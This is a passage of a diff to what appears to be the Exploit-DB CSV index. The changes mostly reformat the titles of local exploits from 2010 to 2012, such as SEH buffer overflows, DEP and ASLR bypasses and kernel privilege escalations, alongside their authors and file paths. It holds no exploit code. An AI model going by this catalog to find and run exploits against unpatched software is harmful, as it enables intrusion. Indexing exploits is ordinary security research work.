Pro 5.20 / ABC Backup 5.50 - '.zip' SEH Exploit",2010-04-30,Lincoln,windows,local,0 +12469,platforms/windows/local/12469.rb,"Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50 - '.zip' File (SEH)",2010-04-30,Lincoln,windows,local,0 12497,platforms/windows/local/12497.c,"PhotoFiltre Studio X - '.tif' Local Buffer Overflow (PoC)",2010-05-04,"fl0 fl0w",windows,local,0 12501,platforms/windows/local/12501.php,"Beyond Compare 3.0.13 b9599 - '.zip' Stack Buffer Overflow (PoC)",2010-05-04,mr_me,windows,local,0 12516,platforms/windows/local/12516.py,"BaoFeng Storm - '.m3u' File Processing Buffer Overflow",2010-05-06,"Lufeng Li and Qingshan Li",windows,local,0 @@ -6640,24 +6643,24 @@ id,file,description,date,author,platform,type,port 12677,platforms/windows/local/12677.html,"Rumba FTP Client 'FTPSFtp.dll' 4.2.0.0 - OpenSession() Buffer Overflow",2010-05-21,sinn3r,windows,local,0 12710,platforms/windows/local/12710.c,"Kingsoft Webshield 'KAVSafe.sys' 2010.4.14.609 (2010.5.23) - Kernel Mode Privilege Escalation",2010-05-23,"Xuanyuan Smart",windows,local,0 12803,platforms/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function Initialize() Buffer Overflow",2010-05-30,sinn3r,windows,local,0 -12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - SEH Exploit",2010-05-31,Stoke,windows,local,0 +12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - (SEH) Exploit",2010-05-31,Stoke,windows,local,0 40335,platforms/windows/local/40335.txt,"ArcServe UDP 6.0.3792 Update 2 Build 516 - Unquoted Service Path Privilege Escalation",2016-09-05,sh4d0wman,windows,local,0 15499,platforms/windows/local/15499.py,"Free WMA MP3 Converter 1.1 - Buffer Overflow (SEH)",2010-11-12,Dr_IDE,windows,local,0 -13756,platforms/windows/local/13756.py,"VUPlayer 2.49 - '.m3u' Universal Buffer Overflow (DEP Bypass) (1)",2010-06-07,mr_me,windows,local,0 +13756,platforms/windows/local/13756.py,"VUPlayer 2.49 - '.m3u' File Universal Buffer Overflow (DEP Bypass) (1)",2010-06-07,mr_me,windows,local,0 13760,platforms/windows/local/13760.py,"Audio Converter 8.1 - Stack Buffer Overflow (PoC)",2010-06-07,sud0,windows,local,0 13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 - Buffer Overflow (SEH)",2010-06-07,chap0,windows,local,0 13763,platforms/windows/local/13763.pl,"Audio Converter 8.1 - Stack Buffer Overflow (PoC) ROP/WPM",2010-06-07,sud0,windows,local,0 13767,platforms/windows/local/13767.c,"SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow (PoC)",2010-06-08,mr_me,windows,local,0 -13768,platforms/php/local/13768.py,"Castripper 2.50.70 - '.pls' Stack Buffer Overflow DEP Bypass",2010-06-08,mr_me,php,local,0 +13768,platforms/php/local/13768.py,"Castripper 2.50.70 - '.pls' File Stack Buffer Overflow DEP Bypass",2010-06-08,mr_me,php,local,0 13806,platforms/windows/local/13806.txt,"ActivePerl 5.8.8.817 - Buffer Overflow",2010-06-09,PoisonCode,windows,local,0 13820,platforms/windows/local/13820.pl,"Power Tab Editor 1.7 (Build 80) - Buffer Overflow",2010-06-11,sud0,windows,local,0 13895,platforms/windows/local/13895.py,"Rosoft Audio Converter 4.4.4 - Buffer Overflow",2010-06-16,blake,windows,local,0 -13905,platforms/windows/local/13905.py,"BlazeDVD 5.1 - '.plf' Stack Buffer Overflow (PoC) (Windows 7 ASLR + DEP Bypass)",2010-06-17,mr_me,windows,local,0 -13907,platforms/windows/local/13907.py,"Winamp 5.572 - Local Buffer Overflow (EIP & SEH DEP Bypass)",2010-06-17,TecR0c,windows,local,0 +13905,platforms/windows/local/13905.py,"BlazeDVD 5.1 - '.plf' File Stack Buffer Overflow (PoC) (Windows 7 ASLR + DEP Bypass)",2010-06-17,mr_me,windows,local,0 +13907,platforms/windows/local/13907.py,"Winamp 5.572 - Local Buffer Overflow (EIP + SEH DEP Bypass)",2010-06-17,TecR0c,windows,local,0 13909,platforms/windows/local/13909.py,"Batch Audio Converter Lite Edition 1.0.0.0 - Stack Buffer Overflow (SEH)",2010-06-17,modpr0be,windows,local,0 13940,platforms/windows/local/13940.pl,"Orbital Viewer 1.04 - '.ov' Local Universal Stack Overflow (SEH)",2010-06-19,Crazy_Hacker,windows,local,0 13942,platforms/windows/local/13942.pl,"MoreAmp - '.maf' Local Stack Buffer Overflow (SEH) (calc)",2010-06-20,Madjix,windows,local,0 -13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' SEH Universal Buffer Overflow",2010-06-23,Madjix,windows,local,0 +13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' File (SEH) Universal Buffer Overflow",2010-06-23,Madjix,windows,local,0 14002,platforms/freebsd/local/14002.c,"FreeBSD Kernel - nfs_mount() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0 14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0 14044,platforms/windows/local/14044.pl,"WM Downloader 2.9.2 - Stack Buffer Overflow",2010-06-25,Madjix,windows,local,0 @@ -6666,14 +6669,14 @@ id,file,description,date,author,platform,type,port 14077,platforms/windows/local/14077.rb,"BlazeDVD 6.0 - Buffer Overflow (Metasploit)",2010-06-27,blake,windows,local,0 14081,platforms/windows/local/14081.pl,"RM Downloader 3.1.3 - Buffer Overflow (SEH)",2010-06-27,Madjix,windows,local,0 14098,platforms/windows/local/14098.py,"GSM SIM Utility 5.15 - sms file Local Buffer Overflow (SEH)",2010-06-28,chap0,windows,local,0 -14150,platforms/windows/local/14150.pl,"RM Downloader 3.1.3 - Local SEH Exploit (Windows 7 ASLR + DEP Bypass)",2010-07-01,Node,windows,local,0 +14150,platforms/windows/local/14150.pl,"RM Downloader 3.1.3 (Windows 7) - Local ASLR + DEP Bypass (SEH)",2010-07-01,Node,windows,local,0 14153,platforms/windows/local/14153.pl,"Mediacoder 0.7.3.4682 - Universal Buffer Overflow (SEH)",2010-07-01,Madjix,windows,local,0 14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0 14215,platforms/windows/local/14215.txt,"SasCam 2.7 - ActiveX Head Buffer Overflow",2010-07-05,blake,windows,local,0 14256,platforms/windows/local/14256.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - ovwebsnmpsrv.exe Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0 14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Local Exploit Direct Ret ver",2010-07-07,chap0,windows,local,0 14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,linux,local,0 -14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - SEH Exploit (Multiple OS ASLR + DEP Bypass) (Metasploit)",2010-07-13,Node,windows,local,0 +14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - (SEH) Multiple OS ASLR + DEP Bypass (Metasploit)",2010-07-13,Node,windows,local,0 14361,platforms/windows/local/14361.py,"Microsoft Excel - 0x5D record Stack Overflow (MS10-038)",2010-07-14,webDEViL,windows,local,0 14373,platforms/win_x86/local/14373.pl,"Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Stack Buffer Overflow Universal",2010-07-16,Madjix,win_x86,local,0 14397,platforms/windows/local/14397.rb,"MoreAmp - Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,windows,local,0 @@ -6704,7 +6707,7 @@ id,file,description,date,author,platform,type,port 14663,platforms/windows/local/14663.py,"MUSE 4.9.0.006 - '.m3u' Local Buffer Overflow",2010-08-16,"Glafkos Charalambous",windows,local,0 14664,platforms/windows/local/14664.py,"MUSE 4.9.0.006 - '.pls' Local Universal Buffer Overflow (SEH)",2010-08-16,"Glafkos Charalambous",windows,local,0 14673,platforms/windows/local/14673.py,"Triologic Media Player 8 - '.m3u' Local Universal Unicode Buffer Overflow (SEH)",2010-08-17,"Glafkos Charalambous",windows,local,0 -14681,platforms/windows/local/14681.py,"A-PDF WAV to MP3 1.0.0 - Universal Local SEH Exploit",2010-08-18,Dr_IDE,windows,local,0 +14681,platforms/windows/local/14681.py,"A-PDF WAV to MP3 1.0.0 - Universal Local (SEH)",2010-08-18,Dr_IDE,windows,local,0 14688,platforms/freebsd/local/14688.c,"FreeBSD - mbufs() sendfile Cache Poisoning Privilege Escalation",2010-08-19,kingcope,freebsd,local,0 14693,platforms/windows/local/14693.py,"Microsoft Word - Record Parsing Buffer Overflow (MS09-027)",2010-08-20,anonymous,windows,local,0 14706,platforms/windows/local/14706.py,"Microsoft Excel - Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0 @@ -6767,34 +6770,34 @@ id,file,description,date,author,platform,type,port 14831,platforms/windows/local/14831.rb,"SnackAmp 3.1.2 - SMP Buffer Overflow (SEH)",2010-08-29,"James Fitts",windows,local,0 14944,platforms/windows/local/14944.py,"Microsoft Visio 2002 - '.DXF' File Stack based Overflow",2010-09-08,Abysssec,windows,local,0 14966,platforms/windows/local/14966.py,"Excel RTD - Memory Corruption",2010-09-10,Abysssec,windows,local,0 -14959,platforms/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended M3U directives SEH Exploit",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local,0 +14959,platforms/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended .M3U Directives (SEH)",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local,0 14961,platforms/win_x86/local/14961.py,"Audiotran 1.4.2.4 - Overflow (SEH)",2010-09-09,"Abhishek Lyall",win_x86,local,0 14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - 'pushstring' Memory Corruption",2010-09-12,Abysssec,windows,local,0 -15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH Exploit",2010-09-15,"sanjeev gupta",windows,local,0 +15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - (SEH) Exploit",2010-09-15,"sanjeev gupta",windows,local,0 15022,platforms/windows/local/15022.py,"Honestech VHS to DVD 3.0.30 Deluxe - Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0 15023,platforms/lin_x86-64/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",lin_x86-64,local,0 15024,platforms/lin_x86-64/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,lin_x86-64,local,0 15026,platforms/windows/local/15026.py,"BACnet OPC Client - Buffer Overflow (1)",2010-09-16,"Jeremy Brown",windows,local,0 -15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - SEH Exploit",2010-09-17,"Abhishek Lyall",windows,local,0 -15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local SEH Exploit",2010-09-17,modpr0be,windows,local,0 +15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - (SEH) Exploit",2010-09-17,"Abhishek Lyall",windows,local,0 +15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local (SEH)",2010-09-17,modpr0be,windows,local,0 15047,platforms/windows/local/15047.rb,"Audiotran 1.4.2.4 - Overflow (SEH) (DEP Bypass)",2010-09-19,"Muhamad Fadzil Ramli",windows,local,0 15099,platforms/windows/local/15099.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH)",2010-09-24,"James Fitts",windows,local,0 15069,platforms/windows/local/15069.py,"Acoustica Audio Converter Pro 1.1 (build 25) - Heap Overflow (.mp3 / .wav / .ogg / .wma) (PoC)",2010-09-21,"Carlos Mario Penagos Hollmann",windows,local,0 15074,platforms/linux/local/15074.sh,"mountall 2.15.2 (Ubuntu 10.04/10.10) - Privilege Escalation",2010-09-21,fuzz,linux,local,0 -15081,platforms/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - SEH Exploit (Metasploit)",2010-09-22,Madjix,windows,local,0 +15081,platforms/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - (SEH) (Metasploit)",2010-09-22,Madjix,windows,local,0 15094,platforms/windows/local/15094.py,"Microsoft Excel - OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0 -15133,platforms/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - SEH Exploit",2010-09-27,"sanjeev gupta",windows,local,0 +15133,platforms/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - (SEH) Exploit",2010-09-27,"sanjeev gupta",windows,local,0 15134,platforms/windows/local/15134.rb,"Digital Music Pad 8.2.3.3.4 - Overflow (SEH) (Metasploit)",2010-09-27,"Abhishek Lyall",windows,local,0 15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure (PoC)",2010-09-29,"Jon Oberheide",linux,local,0 15155,platforms/linux/local/15155.c,"XFS - Deleted Inode Local Information Disclosure",2010-09-29,"Red Hat",linux,local,0 -15156,platforms/windows/local/15156.py,"Quick Player 1.3 - Unicode SEH Exploit",2010-09-29,"Abhishek Lyall",windows,local,0 -15184,platforms/windows/local/15184.c,"AudioTran 1.4.2.4 - SafeSEH + SEHOP Exploit",2010-10-02,x90c,windows,local,0 +15156,platforms/windows/local/15156.py,"Quick Player 1.3 - Unicode (SEH)",2010-09-29,"Abhishek Lyall",windows,local,0 +15184,platforms/windows/local/15184.c,"AudioTran 1.4.2.4 - (SafeSEH + SEHOP) Exploit",2010-10-02,x90c,windows,local,0 15201,platforms/windows/local/15201.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH DEP Bypass)",2010-10-04,"Muhamad Fadzil Ramli",windows,local,0 15206,platforms/bsd/local/15206.c,"FreeBSD - 'pseudofs' Null Pointer Dereference Privilege Escalation",2010-10-04,"Babcia Padlina",bsd,local,0 15285,platforms/linux/local/15285.c,"Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0 15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - '.m3u' Buffer Overflow",2010-11-23,0v3r,windows,local,0 15245,platforms/solaris/local/15245.txt,"Oracle Solaris - 'su' Local Solaris",2010-10-13,prdelka,solaris,local,0 -15609,platforms/windows/local/15609.txt,"Microsoft Windows Vista/7 - Elevation of Privileges (UAC Bypass)",2010-11-24,noobpwnftw,windows,local,0 +15609,platforms/windows/local/15609.txt,"Microsoft Windows Vista/7 - Privilege Escalation (UAC Bypass)",2010-11-24,noobpwnftw,windows,local,0 15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker - '$ORIGIN' Expansion",2010-10-18,"Tavis Ormandy",linux,local,0 15279,platforms/windows/local/15279.rb,"Fat Player 0.6b - '.wav' Buffer Overflow (SEH)",2010-10-18,"James Fitts",windows,local,0 15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow",2010-10-19,Mighty-D,windows,local,0 @@ -6857,7 +6860,7 @@ id,file,description,date,author,platform,type,port 15962,platforms/solaris/local/15962.c,"Linux Kernel (Solaris 10 / < 5.10 138888-01) - Privilege Escalation",2011-01-10,peri.carding,solaris,local,0 15972,platforms/windows/local/15972.c,"DriveCrypt 5.3 - Local Kernel Ring0 SYSTEM Exploit",2011-01-11,mu-b,windows,local,0 16264,platforms/windows/local/16264.pl,"Magic Music Editor - Buffer Overflow",2011-03-02,"C4SS!0 G0M3S",windows,local,0 -15975,platforms/windows/local/15975.py,"Nokia MultiMedia Player 1.0 - SEH Unicode Exploit",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0 +15975,platforms/windows/local/15975.py,"Nokia MultiMedia Player 1.0 - (SEH Unicode)",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0 15985,platforms/windows/local/15985.c,"Microsoft Win32k - Keyboard Layout (MS10-073)",2011-01-13,"Ruben Santamarta",windows,local,0 15994,platforms/windows/local/15994.rb,"eXtremeMP3 Player - Buffer Overflow (SEH)",2011-01-15,"C4SS!0 G0M3S",windows,local,0 16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Buffer Overflow",2011-01-18,h1ch4m,windows,local,0 @@ -6865,7 +6868,7 @@ id,file,description,date,author,platform,type,port 16024,platforms/windows/local/16024.txt,"Microsoft Fax - Cover Page Editor 5.2.3790.3959 Double-Free Memory Corruption",2011-01-24,"Luigi Auriemma",windows,local,0 16070,platforms/windows/local/16070.py,"Virtuosa Phoenix Edition 5.2 - ASX Buffer Overflow (SEH)",2011-01-28,Acidgen,windows,local,0 16071,platforms/windows/local/16071.txt,"Microsoft Internet Explorer - MHTML Protocol Handler Cross-Site Scripting",2011-01-29,80vul,windows,local,0 -16072,platforms/windows/local/16072.py,"WM Downloader 3.1.2.2 2010.04.15 - '.m3u' Buffer Overflow (DEP Bypass)",2011-01-29,sickness,windows,local,0 +16072,platforms/windows/local/16072.py,"WM Downloader 3.1.2.2 2010.04.15 - '.m3u' File Buffer Overflow (DEP Bypass)",2011-01-29,sickness,windows,local,0 16073,platforms/windows/local/16073.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Buffer Overflow (SEH)",2011-01-29,m0nna,windows,local,0 16083,platforms/windows/local/16083.rb,"NetZip - Classic Buffer Overflow (SEH)",2011-01-30,"C4SS!0 G0M3S",windows,local,0 16085,platforms/windows/local/16085.py,"AOL 9.5 - '.rtx' Local Buffer Overflow",2011-01-31,sup3r,windows,local,0 @@ -6952,7 +6955,7 @@ id,file,description,date,author,platform,type,port 16679,platforms/windows/local/16679.rb,"Nuance PDF Reader 6.0 - Launch Stack Buffer Overflow (Metasploit)",2011-01-08,Metasploit,windows,local,0 16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic - '.VBP' Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16681,platforms/windows/local/16681.rb,"Adobe - 'Collab.getIcon()' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 -16682,platforms/windows/local/16682.rb,"Adobe PDF - Escape EXE Social Engineering (No JavaScript)(Metasploit)",2010-12-16,Metasploit,windows,local,0 +16682,platforms/windows/local/16682.rb,"Adobe PDF - Escape EXE Social Engineering (No JavaScript) (Metasploit)",2010-12-16,Metasploit,windows,local,0 16683,platforms/windows/local/16683.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' compiled Buffer Overflow (Metasploit) (4)",2010-09-25,Metasploit,windows,local,0 16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .m3u Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0 16686,platforms/windows/local/16686.rb,"Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)",2011-03-04,Metasploit,windows,local,0 @@ -6967,10 +6970,10 @@ id,file,description,date,author,platform,type,port 16977,platforms/windows/local/16977.pl,"ABBS Electronic Flash Cards 2.1 - '.fcd' Buffer Overflow",2011-03-14,h1ch4m,windows,local,0 16978,platforms/windows/local/16978.rb,"Foxit PDF Reader 4.2 - JavaScript File Write (Metasploit)",2011-03-14,Metasploit,windows,local,0 16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 - Improper Permissions",2011-03-17,LiquidWorm,windows,local,0 -16999,platforms/windows/local/16999.rb,"POP Peeper 3.7 - SEH Exploit",2011-03-18,"Anastasios Monachos",windows,local,0 +16999,platforms/windows/local/16999.rb,"POP Peeper 3.7 - (SEH) Exploit",2011-03-18,"Anastasios Monachos",windows,local,0 17001,platforms/windows/local/17001.pl,"CORE MultiMedia Suite 2011 CORE Player 2.4 - '.m3u' Buffer Overflow",2011-03-18,Rh0,windows,local,0 17012,platforms/windows/local/17012.py,"Mediacoder 2011 RC3 - '.m3u' Buffer Overflow",2011-03-20,"Oh Yaw Theng",windows,local,0 -17013,platforms/windows/local/17013.pl,"MPlayer Lite r33064 - '.m3u' SEH Overflow",2011-03-20,"C4SS!0 and h1ch4m",windows,local,0 +17013,platforms/windows/local/17013.pl,"MPlayer Lite r33064 - '.m3u' Overflow (SEH)",2011-03-20,"C4SS!0 and h1ch4m",windows,local,0 17064,platforms/windows/local/17064.py,"IDEAL Administration 2011 11.4 - Local Buffer Overflow (SEH)",2011-03-29,Dr_IDE,windows,local,0 17083,platforms/linux/local/17083.pl,"HT Editor 2.0.18 - File Opening Stack Overflow",2011-03-30,ZadYree,linux,local,0 17086,platforms/windows/local/17086.pl,"Word List Builder - Buffer Overflow (SEH)",2011-04-01,h1ch4m,windows,local,0 @@ -6986,11 +6989,11 @@ id,file,description,date,author,platform,type,port 17169,platforms/bsd/local/17169.pl,"NEdit 5.5 - Format String",2011-04-14,Tosh,bsd,local,0 17171,platforms/windows/local/17171.pl,"SimplyPlay 66 - '.pls' Buffer Overflow",2011-04-14,"C4SS!0 G0M3S",windows,local,0 17177,platforms/windows/local/17177.rb,"Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)",2011-04-16,"Andrew King",windows,local,0 -17185,platforms/windows/local/17185.py,"Wireshark 1.4.1 < 1.4.4 - SEH Overflow",2011-04-18,sickness,windows,local,0 +17185,platforms/windows/local/17185.py,"Wireshark 1.4.1 < 1.4.4 - Overflow (SEH)",2011-04-18,sickness,windows,local,0 17186,platforms/windows/local/17186.rb,"Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (Metasploit) (1)",2011-04-19,Metasploit,windows,local,0 -17217,platforms/windows/local/17217.py,"Subtitle Processor 7.7.1 - SEH Unicode Buffer Overflow",2011-04-27,"Brandon Murphy",windows,local,0 +17217,platforms/windows/local/17217.py,"Subtitle Processor 7.7.1 - Buffer Overflow (SEH Unicode)",2011-04-27,"Brandon Murphy",windows,local,0 17223,platforms/windows/local/17223.pl,"NetOp Remote Control 8.0 / 9.1 / 9.2 / 9.5 - Buffer Overflow",2011-04-28,chap0,windows,local,0 -17225,platforms/windows/local/17225.rb,"Subtitle Processor 7.7.1 - '.m3u' SEH Unicode Buffer Overflow (Metasploit)",2011-04-28,Metasploit,windows,local,0 +17225,platforms/windows/local/17225.rb,"Subtitle Processor 7.7.1 - '.m3u' File Buffer Overflow (SEH Unicode) (Metasploit)",2011-04-28,Metasploit,windows,local,0 17229,platforms/windows/local/17229.rb,"MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 - '.s3m' Stack Buffer Overflow (Metasploit)",2011-04-30,Metasploit,windows,local,0 17230,platforms/windows/local/17230.rb,"MJM Core Player 2011 - '.s3m' Stack Buffer Overflow (Metasploit)",2011-04-30,Metasploit,windows,local,0 17317,platforms/windows/local/17317.rb,"VisiWave - VWR File Parsing Trusted Pointer (Metasploit)",2011-05-23,Metasploit,windows,local,0 @@ -7004,7 +7007,7 @@ id,file,description,date,author,platform,type,port 17313,platforms/windows/local/17313.rb,"Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (Metasploit)",2011-05-22,Metasploit,windows,local,0 17329,platforms/windows/local/17329.rb,"Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (Without Egg-Hunter) (Metasploit)",2011-05-27,"Alexey Sintsov",windows,local,0 17362,platforms/windows/local/17362.cpp,"OpenDrive 1.3.141 - Local Password Disclosure",2011-06-04,"Glafkos Charalambous",windows,local,0 -17364,platforms/windows/local/17364.py,"The KMPlayer 3.0.0.1440 - '.mp3' Buffer Overflow (Windows XP SP3 DEP Bypass)",2011-06-06,"dookie and ronin",windows,local,0 +17364,platforms/windows/local/17364.py,"The KMPlayer 3.0.0.1440 - '.mp3' File Buffer Overflow (Windows XP SP3 DEP Bypass)",2011-06-06,"dookie and ronin",windows,local,0 17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 - '.mp3' Buffer Overflow (Windows 7 + ASLR Bypass)",2011-06-11,xsploitedsec,windows,local,0 17391,platforms/linux/local/17391.c,"Linux Kernel 2.6.28 / 3.0 (DEC Alpha Linux) - Privilege Escalation",2011-06-11,"Dan Rosenberg",linux,local,0 17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - '.fat' Buffer Overflow",2011-06-23,"Iván García Ferreira",windows,local,0 @@ -7023,7 +7026,7 @@ id,file,description,date,author,platform,type,port 40085,platforms/windows/local/40085.rb,"Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDAV Privilege Escalation (MS16-016) (Metasploit)",2016-07-11,Metasploit,windows,local,0 17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 'KisKrnl.sys' 2011.7.8.913 - Kernel Mode Privilege Escalation",2011-07-22,MJ0011,windows,local,0 17563,platforms/windows/local/17563.py,"Download Accelerator Plus (DAP) 9.7 - '.M3U' File Buffer Overflow (Unicode SEH)",2011-07-23,"C4SS!0 G0M3S",windows,local,0 -17565,platforms/windows/local/17565.pl,"MPlayer Lite r33064 - m3u Buffer Overflow (DEP Bypass)",2011-07-24,"C4SS!0 and h1ch4m",windows,local,0 +17565,platforms/windows/local/17565.pl,"MPlayer Lite r33064 - '.m3u' Buffer Overflow (DEP Bypass)",2011-07-24,"C4SS!0 and h1ch4m",windows,local,0 17600,platforms/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - '.pls' Buffer Overflow (DEP Bypass)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0 17604,platforms/windows/local/17604.rb,"ABBS Audio Media Player 3.0 - Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",windows,local,0 17605,platforms/windows/local/17605.rb,"ABBS Electronic Flashcards 2.1 - Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",windows,local,0 @@ -7046,13 +7049,13 @@ id,file,description,date,author,platform,type,port 17780,platforms/windows/local/17780.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (1)",2011-09-05,blake,windows,local,0 17783,platforms/windows/local/17783.pl,"ZipX 1.71 - '.ZIP' File Buffer Overflow",2011-09-05,"C4SS!0 G0M3S",windows,local,0 17788,platforms/windows/local/17788.py,"DVD X Player 5.5 Pro - Overwrite (SEH)",2011-09-06,blake,windows,local,0 -17803,platforms/windows/local/17803.php,"DVD X Player 5.5 Pro - SEH + ASLR + DEP Bypass Exploit",2011-09-08,Rew,windows,local,0 +17803,platforms/windows/local/17803.php,"DVD X Player 5.5 Pro - SEH + ASLR + DEP Bypass",2011-09-08,Rew,windows,local,0 17817,platforms/windows/local/17817.php,"ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Buffer Overflow",2011-09-12,mr_me,windows,local,0 17820,platforms/windows/local/17820.c,"Aika 0.2 - colladaconverter Xml Parsing Buffer Overflow",2011-09-12,isciurus,windows,local,0 17821,platforms/windows/local/17821.py,"Wav Player 1.1.3.6 - '.pll' Buffer Overflow",2011-09-12,"Iván García Ferreira",windows,local,0 17833,platforms/windows/local/17833.rb,"ScadaTEC ScadaPhone 5.3.11.1230 - Stack Buffer Overflow (Metasploit)",2011-09-13,Metasploit,windows,local,0 17847,platforms/windows/local/17847.py,"Mini-stream Ripper 2.9.7 - DEP Bypass",2011-09-16,blake,windows,local,0 -17854,platforms/windows/local/17854.py,"MY MP3 Player 3.0 - '.m3u' Exploit DEP Bypass",2011-09-17,blake,windows,local,0 +17854,platforms/windows/local/17854.py,"MY MP3 Player 3.0 - '.m3u' DEP Bypass",2011-09-17,blake,windows,local,0 17877,platforms/windows/local/17877.py,"AVCon - DEP Bypass",2011-09-20,blake,windows,local,0 17880,platforms/windows/local/17880.rb,"eSignal and eSignal Pro 10.6.2425.1208 - File Parsing Buffer Overflow in QUO (Metasploit)",2011-09-20,Metasploit,windows,local,0 17892,platforms/windows/local/17892.pl,"Muse Music All-in-One 1.5.0.001 - '.pls' Buffer Overflow (DEP Bypass)",2011-09-26,"C4SS!0 G0M3S",windows,local,0 @@ -7098,9 +7101,9 @@ id,file,description,date,author,platform,type,port 18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow (Unicode SEH) (Metasploit)",2012-01-17,Metasploit,windows,local,0 18366,platforms/windows/local/18366.rb,"Adobe Reader - U3D Memory Corruption (Metasploit)",2012-01-14,Metasploit,windows,local,0 18411,platforms/linux/local/18411.c,"Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Privilege Escalation (1)",2012-01-23,zx2c4,linux,local,0 -18471,platforms/windows/local/18471.c,"TORCS 1.3.2 - xml Buffer Overflow /SAFESEH evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0 +18471,platforms/windows/local/18471.c,"TORCS 1.3.2 - '.xml' File Buffer Overflow /SafeSEH Evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0 18500,platforms/windows/local/18500.py,"Blade API Monitor - Unicode Bypass (Serial Number) Buffer Overflow",2012-02-20,b33f,windows,local,0 -18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - SEH Exploit (Metasploit)",2012-02-20,Death-Shadow-Dark,windows,local,0 +18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - (SEH) (Metasploit)",2012-02-20,Death-Shadow-Dark,windows,local,0 18515,platforms/windows/local/18515.rb,"Orbit 